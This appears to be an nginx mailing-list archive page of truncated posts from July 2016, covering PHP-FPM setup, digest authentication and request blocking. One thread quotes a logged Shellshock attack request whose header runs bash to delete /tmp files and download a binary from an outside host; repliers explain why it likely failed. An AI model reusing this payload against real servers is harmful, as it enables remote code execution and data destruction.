See https://forum.nginx.org/read.php?2,267651
at this level nginx is not an advanced all layer firewall/ids/dds tool.
Posted at Nginx Forum:
https://forum.nginx.org/read.php?2,268629,268646#msg-268646
___
nginx mailing list
nginx@nginx.org
http://mailm
On Sat, 30 Jul 2016 23:49:30 +0300
"Valentin V. Bartenev" wrote:
> On Saturday 30 July 2016 10:52:46 li...@lazygranch.com wrote:
> > On Sat, 30 Jul 2016 13:18:47 +0300
> > "Valentin V. Bartenev" wrote:
> >
> > > On Friday 29 July 2016 23:01:05 li...@lazygranch.com wrote:
> > > > I see a fair am
Hi,
On Sun, Jul 31, 2016, at 05:44, Simon Hönscheid wrote:
> server {
>server_name www.example.com;
>listen xxx.xxx.xxx.xx:443 ssl http2;
>access_log /var/log/nginx/www.example.com-access.log combined;
>error_log /var/log/nginx/www.example.com-error.log notice;
>ssl_protocols T
Hey,
Debian has no selinux.
Kind Regards
Simon
Am 30.07.16 um 23:08 schrieb Hamza Aboulfeth:
Hello,
Run into the same issue myself yesterday, try disabling selinux, should fix
your issue.
Hamza
On 30 juil. 2016, at 21:44, Simon Hönscheid
wrote:
Hello List,
due to a Server move, I was
Hello,
Run into the same issue myself yesterday, try disabling selinux, should fix
your issue.
Hamza
> On 30 juil. 2016, at 21:44, Simon Hönscheid
> wrote:
>
> Hello List,
>
> due to a Server move, I was setting up a new nginx installation. Some of the
> pages need php. So far nothing new.
On Saturday 30 July 2016 10:52:46 li...@lazygranch.com wrote:
> On Sat, 30 Jul 2016 13:18:47 +0300
> "Valentin V. Bartenev" wrote:
>
> > On Friday 29 July 2016 23:01:05 li...@lazygranch.com wrote:
> > > I see a fair amount of hacking attempts in the access.log. That is,
> > > they
> > show up wi
Hello List,
due to a Server move, I was setting up a new nginx installation. Some of
the pages need php. So far nothing new. When I start adding
SCRIPT_FILENAME to the php location, it ends up that the script is no
longer found.
==> /var/log/nginx/www.example.com-error.log <==
2016/07/30 21
A 400 doesn't reach location blocks.
Posted at Nginx Forum:
https://forum.nginx.org/read.php?2,268629,268638#msg-268638
___
nginx mailing list
nginx@nginx.org
http://mailman.nginx.org/mailman/listinfo/nginx
Thanks. I am patched for shellshock. The 200 return code through me off.
Original Message
From: Reinis Rozitis
Sent: Saturday, July 30, 2016 12:21 PM
To: nginx@nginx.org
Reply To: nginx@nginx.org
Subject: Re: Bash script; Was it executed?
> I see a return code of 200. Does that mean this scr
I see a return code of 200. Does that mean this script was executed?
The return code is for GET request on /.
Unless you have an index page that "executes" (typically cgi) referer or
browser useragent.
It seems as an bash vulnerabilty (known as shellshock CVE-2014-6271)
attempt.
rr
___
Not unless your / location passes the request to a vulnerable cgi-script
using a vulnerable version of bash.
See https://en.wikipedia.org/wiki/Shellshock_(software_bug)
On Sat, Jul 30, 2016 at 7:57 PM, li...@lazygranch.com
wrote:
> I see a return code of 200. Does that mean this script was exec
I see a return code of 200. Does that mean this script was executed?
-
219.153.48.45 - - [30/Jul/2016:07:40:07 +] "GET / HTTP/1.1" 200 643
"() { :; }; /bin/bash -c \x22rm -rf /tmp/*;ech o wget
http://houmen.linux22.cn:123/houmen/linux223 -O /tmp/China.Z-slma
>> /tmp/Run.sh;echo echo
On Sat, 30 Jul 2016 13:18:47 +0300
"Valentin V. Bartenev" wrote:
> On Friday 29 July 2016 23:01:05 li...@lazygranch.com wrote:
> > I see a fair amount of hacking attempts in the access.log. That is,
> > they
> show up with a return code of 400 (malformed). Well yeah, they are
> certainly malform
Dear all,
I have a very simple webserver running with php-fpm connected (to handle
php scripts).
It is running perfectly fine without authentication (on a FreeBSD
installation).
If I enable auth_digest (which is enabled in the FreeBSD port I
compiled), I see only in the main error log the line:
2
On Friday 29 July 2016 23:01:05 li...@lazygranch.com wrote:
> I see a fair amount of hacking attempts in the access.log. That is, they
show up with a return code of 400 (malformed). Well yeah, they are certainly
malformed. But when I add the offending IP address to my blocked list, they
still sh
15 matches
Mail list logo
